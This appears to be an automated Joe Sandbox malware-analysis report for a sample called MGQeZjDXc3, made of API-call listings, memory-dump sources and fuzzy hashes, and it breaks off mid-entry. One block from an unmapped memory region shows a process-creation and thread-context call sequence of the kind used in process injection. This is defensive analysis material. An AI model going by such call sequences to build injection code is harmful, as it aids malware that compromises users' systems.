                                                • Opcode Fuzzy Hash: 624e438073e47fd376f9f3e2270fed88f011f7b0125d9576a334025ae5a9d0ae
                                                • Instruction Fuzzy Hash: CE11AC719083419BC700EF29E905A0ABFE9EB96350F00891FF584832E2DBB58941CF92
                                                APIs
                                                • ___lock_fhandle.LIBCMT ref: 00ACEA29
                                                • __close_nolock.LIBCMT ref: 00ACEA42
                                                  • Part of subcall function 00AC7BDA: __getptd_noexit.LIBCMT ref: 00AC7BDA
                                                  • Part of subcall function 00AC7C0E: __getptd_noexit.LIBCMT ref: 00AC7C0E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                • String ID:
                                                • API String ID: 1046115767-0
                                                • Opcode ID: b869d9c9f88ad4f5d41931b6128ad7811ad9557d98c88b52eef239d13d787fd5
                                                • Instruction ID: 59ce2ac1f5915abe3769aacb59912aa21ab834b79d369e7d5481ecf6dd654d23
                                                • Opcode Fuzzy Hash: b869d9c9f88ad4f5d41931b6128ad7811ad9557d98c88b52eef239d13d787fd5
                                                • Instruction Fuzzy Hash: F8118272909A109ED711FF68CA42F6D7AA16F81372F27434CE4215F1E2CBB88C408BA1
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AA3DEE,00B61148,?,?,?,?,?,00AA3AA3,?), ref: 00AA6471
                                                • _wcscat.LIBCMT ref: 00B15DDB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: FullNamePath_wcscat
                                                • String ID:
                                                • API String ID: 2109976907-0
                                                • Opcode ID: 0a6c5d2c7215c72ed9ee65726ca5125e5ac8eea91c4eaa4c0471d4b5feef9ab1
                                                • Instruction ID: 6b20995d614b9f201833e584601e28abe6e023e7ee0a3eac5f4c3566f2daaf43
                                                • Opcode Fuzzy Hash: 0a6c5d2c7215c72ed9ee65726ca5125e5ac8eea91c4eaa4c0471d4b5feef9ab1
                                                • Instruction Fuzzy Hash: 49118836904105AB8B01EB68CB41ECD73F9EF4D354F1441A5B549D71C0DF74D7888B61
                                                APIs
                                                  • Part of subcall function 00AC395C: __FF_MSGBANNER.LIBCMT ref: 00AC3973
                                                  • Part of subcall function 00AC395C: __NMSG_WRITE.LIBCMT ref: 00AC397A
                                                  • Part of subcall function 00AC395C: RtlAllocateHeap.NTDLL(012F0000,00000000,00000001,00000001,00000000,?,?,00ABF507,?,0000000E), ref: 00AC399F
                                                • std::exception::exception.LIBCMT ref: 00ABF51E
                                                • __CxxThrowException@8.LIBCMT ref: 00ABF533
                                                  • Part of subcall function 00AC6805: RaiseException.KERNEL32(?,?,0000000E,00B56A30,?,?,?,00ABF538,0000000E,00B56A30,?,00000001), ref: 00AC6856
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 3902256705-0
                                                • Opcode ID: 34160c2811b4210aa275f783609b0e854884137b56eaf5e5a20f2d62741d32c5
                                                • Instruction ID: e1a3db20268ca11044c10bdf69e52259aa4adb90a32cceba4208b2bc73428a8f
                                                • Opcode Fuzzy Hash: 34160c2811b4210aa275f783609b0e854884137b56eaf5e5a20f2d62741d32c5
                                                • Instruction Fuzzy Hash: 96F0A43210421D6BDB14FF98EE02FDE77ECAF05354F644569FA0892182DBB1964086A5
                                                APIs
                                                  • Part of subcall function 00AC7C0E: __getptd_noexit.LIBCMT ref: 00AC7C0E
                                                • __lock_file.LIBCMT ref: 00AC3629
                                                  • Part of subcall function 00AC4E1C: __lock.LIBCMT ref: 00AC4E3F
                                                • __fclose_nolock.LIBCMT ref: 00AC3634
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                • Opcode ID: f8a3b2dc851f60e7eaabe19c2689388b99ea97c5204ec21a9088fb38907b28ea
                                                • Instruction ID: cf2706cbaa81023e0b9f32d2b07677536a42adab2f7b8bd0e20dd2d76fe5a991
                                                • Opcode Fuzzy Hash: f8a3b2dc851f60e7eaabe19c2689388b99ea97c5204ec21a9088fb38907b28ea
                                                • Instruction Fuzzy Hash: 5EF09072801204AADF11BB658A02F6FBAA06F41334F27C14DE421AB2D2CB7C8A019A55
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01338C43
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01338CD9
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01338CFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144958630.0000000001337000.00000040.00000020.00020000.00000000.sdmp, Offset: 01337000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1337000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                • Instruction ID: 8eae919aa518a120a6d2d9c360c2b6c084d0751881ecee2d48c017327c34f3b8
                                                • Opcode Fuzzy Hash: 7bc2eb71131a5ca0d961fb64b4ce1da28befc4a8e94ed8bda1bc50d134690387
                                                • Instruction Fuzzy Hash: A612CD24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                                                APIs
                                                • __flush.LIBCMT ref: 00AC2A0B
                                                  • Part of subcall function 00AC7C0E: __getptd_noexit.LIBCMT ref: 00AC7C0E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __flush__getptd_noexit
                                                • String ID:
                                                • API String ID: 4101623367-0
                                                • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                • Instruction ID: fba22486777eeb6f457cbac03ed6995867386831e98315c578e4516437048ec6
                                                • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                • Instruction Fuzzy Hash: DD416271600706AFDF289FA9C981FAE7BB6AF443A0F26853DE855C7244EA70DD418B40
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction ID: 85b97af6689b2d6c864462f7abf783d7e155536dd77ab9e9b8ac4d3a4132e1fb
                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                • Instruction Fuzzy Hash: BE31B274A001059BDB18DF58C490AE9FBBAFF49340B6486A5E40ACB366DB71EDC1DB90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 9d9232f943cfb2c6b561300f493953973537ab94737fd454628afc7537103190
                                                • Instruction ID: f8c996443639665533615252a11fd845d7b74d61aa327e5853a8b4e2dd4ab3bf
                                                • Opcode Fuzzy Hash: 9d9232f943cfb2c6b561300f493953973537ab94737fd454628afc7537103190
                                                • Instruction Fuzzy Hash: F0414A705086418FDB24DF18C494B5ABBE0BF45304F1989ACE99A4B362C372F885CF52
                                                APIs
                                                  • Part of subcall function 00AA4214: FreeLibrary.KERNEL32(00000000,?), ref: 00AA4247
                                                • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00AA39FE,?,00000001), ref: 00AA41DB
                                                  • Part of subcall function 00AA4291: FreeLibrary.KERNEL32(00000000), ref: 00AA42C4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Library$Free$Load
                                                • String ID:
                                                • API String ID: 2391024519-0
                                                • Opcode ID: dbe062cd5b241680706dfdcfba1841952ae4e533c3979dcf9393c659348c7572
                                                • Instruction ID: 5b223c04f5ca616d8f4d8a51484ef3fcf6cbbba4e263ba61af36cbd077080a9f
                                                • Opcode Fuzzy Hash: dbe062cd5b241680706dfdcfba1841952ae4e533c3979dcf9393c659348c7572
                                                • Instruction Fuzzy Hash: 1311C431600206ABDB10AB74DE06FDE77E99F89700F10842DB596AB1C1DBB4DA099B60
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: cc1c94ac185a5e37d86572cb9e847b8e3724c73ee1b54622a5f4223849e10f72
                                                • Instruction ID: c9601e17c040d080cc55e5af93820998611723367827f531acf6938c257a28e2
                                                • Opcode Fuzzy Hash: cc1c94ac185a5e37d86572cb9e847b8e3724c73ee1b54622a5f4223849e10f72
                                                • Instruction Fuzzy Hash: 842105705086018FDB24DF68C544F5BBBF5BF85304F194AA8E99A4B262C732F885CF52
                                                APIs
                                                • ___lock_fhandle.LIBCMT ref: 00ACAFC0
                                                  • Part of subcall function 00AC7BDA: __getptd_noexit.LIBCMT ref: 00AC7BDA
                                                  • Part of subcall function 00AC7C0E: __getptd_noexit.LIBCMT ref: 00AC7C0E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __getptd_noexit$___lock_fhandle
                                                • String ID:
                                                • API String ID: 1144279405-0
                                                • Opcode ID: 2e67d7a2bcc8796575d75d2155205fdd5c8f6a1341e4f4b55aa72bb8bfad98ee
                                                • Instruction ID: 1a37e36150a20d187e9cb7680d416e320f799c7239e80a422ece076e9d9bd21b
                                                • Opcode Fuzzy Hash: 2e67d7a2bcc8796575d75d2155205fdd5c8f6a1341e4f4b55aa72bb8bfad98ee
                                                • Instruction Fuzzy Hash: 1011B2728156109BD712BFA8CA03F6E3661AF51335F17424CE4310F1E2CBB98D008BB2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                • Instruction ID: eb9ebae6be94e3a1ab169471c3aa36ff88e1004c168d3399e13e1908a79367fa
                                                • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                • Instruction Fuzzy Hash: 1F018632500109AFCF04EF64C981CEEBB74EF16344F108069B515971D5EB309A49CB60
                                                APIs
                                                • CharUpperBuffW.USER32(00000000,?,00000000,?,-00000003,?,00AA68B0,?,?,?,-00000003,00000000,00000000), ref: 00AA54AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID:
                                                • API String ID: 3964851224-0
                                                • Opcode ID: 7d1cedaf8adbe5620aa9f0b29887811d6b1fa02a735b0e76a1bd16a5d442d0ca
                                                • Instruction ID: 300eda46df47396019cc4955a93cddaf0b430d870b7403bd925a18f846735c9b
                                                • Opcode Fuzzy Hash: 7d1cedaf8adbe5620aa9f0b29887811d6b1fa02a735b0e76a1bd16a5d442d0ca
                                                • Instruction Fuzzy Hash: 7CF0F675A04B25EBC7225F21C500A2DF775FF8AB62F108129F4494B681CB719860C7D8
                                                APIs
                                                • __lock_file.LIBCMT ref: 00AC2AED
                                                  • Part of subcall function 00AC7C0E: __getptd_noexit.LIBCMT ref: 00AC7C0E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: __getptd_noexit__lock_file
                                                • String ID:
                                                • API String ID: 2597487223-0
                                                • Opcode ID: 809fe83e7876af4a33ad392d52ae5932181ccfd331fe0b41ae633ebdbeefe581
                                                • Instruction ID: 8ae6f8b4dfdcac7e898df63d986967e1afbed09569a6730ec363248cfb3e1342
                                                • Opcode Fuzzy Hash: 809fe83e7876af4a33ad392d52ae5932181ccfd331fe0b41ae633ebdbeefe581
                                                • Instruction Fuzzy Hash: CDF06231900205AAEF21AF658E06F9F36A5BF00350F17855DF4249B1A1D7B98A62DB51
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,?,?,?,00AA39FE,?,00000001), ref: 00AA4286
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 30e2858f17b8c42182cebdff1f9a628b65d426d25aedd3b3289fe5157bfd3025
                                                • Instruction ID: 26663638bd6916a7421ae1be119bb0f16a1f73ea0de9ae4f426a43c54f35283c
                                                • Opcode Fuzzy Hash: 30e2858f17b8c42182cebdff1f9a628b65d426d25aedd3b3289fe5157bfd3025
                                                • Instruction Fuzzy Hash: A7F01CB1505701CFDB349F64D490956F7F4AF593153248A2EF1D683550C7B19848DB50
                                                APIs
                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AA40C6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: LongNamePath
                                                • String ID:
                                                • API String ID: 82841172-0
                                                • Opcode ID: 1b5935a54629305dfce8299907a649a142dc5daa819f5088c0c81f9f8e176af4
                                                • Instruction ID: 410f0166a4cdede9cf092e66430cbe4ac33a9e32e59390854fe8b7f908cb9744
                                                • Opcode Fuzzy Hash: 1b5935a54629305dfce8299907a649a142dc5daa819f5088c0c81f9f8e176af4
                                                • Instruction Fuzzy Hash: CEE0C2366002245FC721A658CC46FEA77ADDF886A0F0A00B5F909E7244DE64AD818A90
                                                APIs
                                                • Sleep.KERNELBASE(000001F4), ref: 01339499
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144958630.0000000001337000.00000040.00000020.00020000.00000000.sdmp, Offset: 01337000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1337000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction ID: 3661f6c8612f18a8ad125524423d73de7c57a31c857af2cfb5715d36e65a77ec
                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction Fuzzy Hash: 8EE0E67494010DDFDB00DFB4D54969D7BB4EF04301F104161FD01E2281D6709D508A62
                                                APIs
                                                  • Part of subcall function 00ABB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ABB35F
                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00B0F87D
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B0F8DC
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00B0F919
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B0F940
                                                • SendMessageW.USER32 ref: 00B0F966
                                                • _wcsncpy.LIBCMT ref: 00B0F9D2
                                                • GetKeyState.USER32(00000011), ref: 00B0F9F3
                                                • GetKeyState.USER32(00000009), ref: 00B0FA00
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B0FA16
                                                • GetKeyState.USER32(00000010), ref: 00B0FA20
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B0FA4F
                                                • SendMessageW.USER32 ref: 00B0FA72
                                                • SendMessageW.USER32(?,00001030,?,00B0E059), ref: 00B0FB6F
                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00B0FB85
                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B0FB96
                                                • SetCapture.USER32(?), ref: 00B0FB9F
                                                • ClientToScreen.USER32(?,?), ref: 00B0FC03
                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B0FC0F
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00B0FC29
                                                • ReleaseCapture.USER32 ref: 00B0FC34
                                                • GetCursorPos.USER32(?), ref: 00B0FC69
                                                • ScreenToClient.USER32(?,?), ref: 00B0FC76
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B0FCD8
                                                • SendMessageW.USER32 ref: 00B0FD02
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B0FD41
                                                • SendMessageW.USER32 ref: 00B0FD6C
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B0FD84
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B0FD8F
                                                • GetCursorPos.USER32(?), ref: 00B0FDB0
                                                • ScreenToClient.USER32(?,?), ref: 00B0FDBD
                                                • GetParent.USER32(?), ref: 00B0FDD9
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00B0FE3F
                                                • SendMessageW.USER32 ref: 00B0FE6F
                                                • ClientToScreen.USER32(?,?), ref: 00B0FEC5
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B0FEF1
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00B0FF19
                                                • SendMessageW.USER32 ref: 00B0FF3C
                                                • ClientToScreen.USER32(?,?), ref: 00B0FF86
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B0FFB6
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00B1004B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
